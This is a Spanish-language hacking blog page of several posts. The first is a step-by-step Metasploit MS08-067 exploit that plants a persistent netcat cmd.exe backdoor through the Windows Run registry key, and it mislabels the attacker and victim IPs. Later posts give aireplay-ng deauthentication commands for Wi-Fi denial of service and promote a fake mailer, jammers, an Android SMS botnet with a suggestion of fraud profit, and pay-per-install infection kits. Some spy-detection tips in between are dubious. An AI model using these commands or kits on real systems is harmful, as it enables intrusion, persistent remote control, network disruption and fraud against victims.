Social Icons

domingo, 26 de agosto de 2012

Backdoor en window con metasploit y netcat

Buenas buenas gente!
hoy les traigo com hacer un backdoor a un window$ con 'Metasploit' ( el dios de dioses ) y el netcat (nc)
si usan un poco la imaginacion se puede hacer un monton de cosas ;) 

primero copiamos este archivo que es el netcat para windows al escritorio para un acceso mas rapido


root@bt:~# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/

ahora abrimos el metasploit y comenzamos la configuracion

root@bt:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi)) > set lhost 192.168.1.102 (IP victima)
msf exploit(ms08_067_netapi)) > set rhost 192.168.1.103 (nuestra IP)
msf exploit(ms08_067_netapi)) > exploit

usa vez que allamos explotando la vulnerabilidad y tengamos acceso a meterpreter empezamos a configurar el backdoor

meterpreter > upload /root/Desktop/nc.exe C:\\WINDOWS\\system32\\
meterpreter > reg enumkey -k HKLM\\Software\\Windows\\CurrentVerion\\RUN
meterpreter > reg setval -k HKLM\\Software\\Windows\\CurrentVerion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 666 -e cmd.exe"
meterpreter > reg enumkey -k HKLM\\Software\\Windows\\CurrentVerion\\RUN
meterpreter > reboot

el windows se reiniciara, y ejecutara nuestro backdoor al inicio.

y ahora nos conectamos que el netcat de nuestra maquina


root@bt:~# nc 192.168.1.102 666

Listo :D

Tips to Detect Spies Devices !

Bueno pues navegando me encontre con algunos Tips muy interesantes y se los dejo a ustedes espero les sea de ayuda



COMO DESCUBRIR UNA CAMARA OCULTA CON TU CELULAR 

Si sospechas tener instalada una cámara oculta en tu oficina, habitación, etc., puedes detectarla fácilmente utilizando la cámara de tu teléfono celular, simplemente apaga todas las luces del recinto y toma varias fotografías de los lugares que te pasarían mas desapercibidos, con el FLASH activado, el DCC (ojo digital de la cámara oculta) aparecerá como un pequeño punto brillante (reflejado en la lente de enfoque de dicha cámara).



EL MEJOR LUGAR PARA COMUCNICAR UN SECRETO 

Si tienes que comunicar un "secreto" (verbalmente) el mejor lugar para hacerlo (siendo civil) es un GRAN VIVERO (invernadero) después de efectuarse el "riego automático".La cantidad de plantas y arboles en ese lugar, hacen imposible la escucha utilizando micrófonos por estática, la "entropía" en las formas de las hojas, dificulta la escucha por "lectura de labios", el nylon que es utilzado normalmente para recubrir las paredes del vivero (su opacidad y flexibilidad al viento) hacen casi imposible la escucha por "micrófonos lásers", finalmente la forma "curva" de sus paredes dificultan otros tipos de escuchas.

COMO ANULAR LA SEÑAL DE TU CELULAR 

Si deseas no ser "plotteado" por tu empresa de telefonía o Gobierno, ni que, quien posea el conocimiento suficiente, escuche tus conversaciones a través del micrófono de tu celular, pues retírale la batería y acto seguido colócalo dentro del horno microondas (apagado), su estructura esta especialmente diseñada para BLOQUEAR este tipo de señales.

Como descubrir un "MICROFONO OCULTO" Con un radio de FM

Si sospechas tener instalado un micrófono oculto en tu casa u oficina, puedes detectarlo fácilmente si transmite por modulación de frecuencias, utilizando un radio receptor de FM y audifonos o auriculares.

Simplemente apaga todas las fuentes de sonido e interferencias (celular, TV, microondas, placas Wi-Fi, etc.), acto seguido aplica leves golpecitos continuos sobre las paredes y mueve el dial (sintonizador) de tu radio muy lentamente (completo, de izquierda a derecha y vs)

Si escuchas un "chasquido" o un "sonido repetitivo", puede tratarse de uno, sal de tu casa y desde un teléfono público ponte en contacto con alguna empresa que posea instrumental mas sensible y ayude a su exacta ubicación.



EN DONDE BUSCAR UN MICROFONO OCULTO (VISUALMENTE)

Si sospechas tener instalado un micrófono oculto en tu casa u oficina, puedes comenzar a buscarlo (visualmente) en los siguientes sitios: el interior de las tapas de luz (o tomacorrientes), alargues eléctricos (extensores de línea), veladores (eléctricos y a pilas), cuadros, electrodomésticos, y básicamente en todo lugar que permanezca conectado a la red eléctrica o posea baterías para su uso, como ser relojes de pared o mesa, termómetros para colgar, etc. 


COMO RECONOCER UN ESPEJO SEMI TRANSLUCIDO O FALSO

Para descubrir si te están observando del otro lado de un espejo (por ejemplo, en un probador de ropa, hotel, etc.), simplemente coloca tu uña tocando el vidrio, si la imagen de tu uña toca a la verdadera uña de tu dedo "COOOOOORREEEEE" a hacer la denuncia!!! pues se trata de un espejo "F.A.L.S.O.", por el contrario, si notas un espacio de unos milímetros entre la imagen de tu uña reflejada en el espejo y la verdadera de tu dedo "ya puedes estar tranquilo!!" el espejo es REALMENTE un espejo (esto es así, porque en el espejo "VERDADERO", el material reflectivo se encuentra detras del vidio del espejo, por eso ves la separación entre las dos imágenes, mientras que si es falso el material reflectivo se deposita en la parte del vidio mas próxima a la persona, es decir, sobre el lado opuesto al de la pared en donde esté colgado dicho espejo)


COMO DESCUBRIR A UN MENTIROSO

Para descubrir si alguien "miente", debemos fijarnos si no transpira en sus manos, frente y a los costados de su cara, si su gesticulación es excesiva (como un comediante), o se toca la nariz (si es adulto) o tiende a tapar su boca (para los niños). Lo mejor, hacerles varias preguntas y luego repetírselas en orden contrario" 

COMO COMUNICAR UN MENSAJE SECRETO

Para escribir un mensaje "oculto" en donde estemos, debemos utilizar cualquier compuesto de carbono como tinta, sobre un papel preferentemente en blanco, lo que tengamos a mano en esa situación y momento, por ejemplo: limón (de la cocina), orina (ingresamos a un baño público p.e.), vinagre (nos pedimos una ensalada que lo trae en sobres y lo utilizamos sobre la servilleta que normalmente se adjunta), etc., luego para leerlo nuestra contraparte solo debe calentar cuidadosamente con un encendedor el papel para que "reaccione" el carbono y se oscurezca



Free Fake Mailer

Free Fake Mailer   http://emkei.cz/

Bloquear un Wifi Temporalmente

1.- INHIBIDOR: Un Inhibidor de Señales Wifi es auqella herramienta fisica cuyo fin es la de hacer nulas las conexiones en una determinada Zona.

VEREMOS ALGUNOS INHIBIDORES PARA SEÑALES WIFI:









sin duda tienen muy buena pinta y son muy discretos.
Pag: http://www.inhibidores.com 

2.-DoS

Cuando se quiere realizar un ataque DoS a una Red Wi-fi, se puede atacar de 2 formas, una es atacando al punto de acceso y dejar sin acceso a ningún cliente o atacando solamente a un cliente en específico.

* ponemos nuestra tarjeta en modo monitor.
Código:
airmon-ng start wlan0
* Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en específico.
Código:
airmon-ng -c 5 mon0
Donde 5 es el canal del punto de acceso y mon0 es la interfaz en modo monitor.

* DoS al punto de acceso:
Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) al Punto de acceso.
Código:
aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso.

* DoS al Cliente:
Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) a un cliente en específico.
Código:
aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.

Si esto no les pareció lo suficientemente fácil, Abdulla Aleid realizo un pequeño script que automatiza todo este proceso, pero es un poco más efectivo ya que envia solo 100 paquetes de deautenticación, pero con un loop infinito que sobrecarga aun más la red Wi-fi:

Descarga: http://www.mediafire.com/?9tutyrz1c9l1dxe

Fuentes: http://www.inhibidores.com http://www.blackploit.com http://andres-elladooscuro.blogspot.mx/

Android Botnet



En esta ocasion les traigo algo muy curioso que encontre, se trata de una botnet para telefonos moviles con Android.
La funcion principal es infectar muchos telefonos moviles, y luego por medio de comandos, ejecuta alguna accion. En este caso es el envio de sms.
Pensando un poco, llegue a la conclusion de que se le podria sacar provecho con esas paginas que pagan por sms. Ya que si se infectan 50 telefonos y se envian 4 mensajes con cada uno de ellos, harian un total de 200 sms... Imaginen el dinero que se podria sacar con eso...
No expongo esto para que hagan exactamente eso, sino para que estudien su codigo y para que vean con que fuerza se vienen estos nuevos malwares futuristicos.


El comando del bot es:

BOT: SPAM {number to spam} {message}

Saludos a todos!

SEO Browser



Cuando hablamos de métodos y técnicas que no son legales para posicionarse en los buscadores pero que sirven para adquirir una mejor posición en los resultados de los buscadores estamos hablando de Black Hat SEO, entre las características que más destacan el uso de esta técnica se encuentran algunas de las siguientes:

Romper las reglas establecidas por los buscadores
Afectar la experiencia de usuario de forma negativa debido a la aplicación de algunas de estas técnicas.
Presentación de contenido alternado por algoritmos para generar contenido automático.

http://www.mediafire.com/?yp1cfww75h55mbz

Temas de Infeccion Pay - Per Install

Aqui algunos temas de Infeccion Pay - Per Install
Porfavor usenlas pero con cuidado porque pueden tener problemas con la ley.

Download: http://www.mediafire.com/?mr4bcmy4c5ij0q5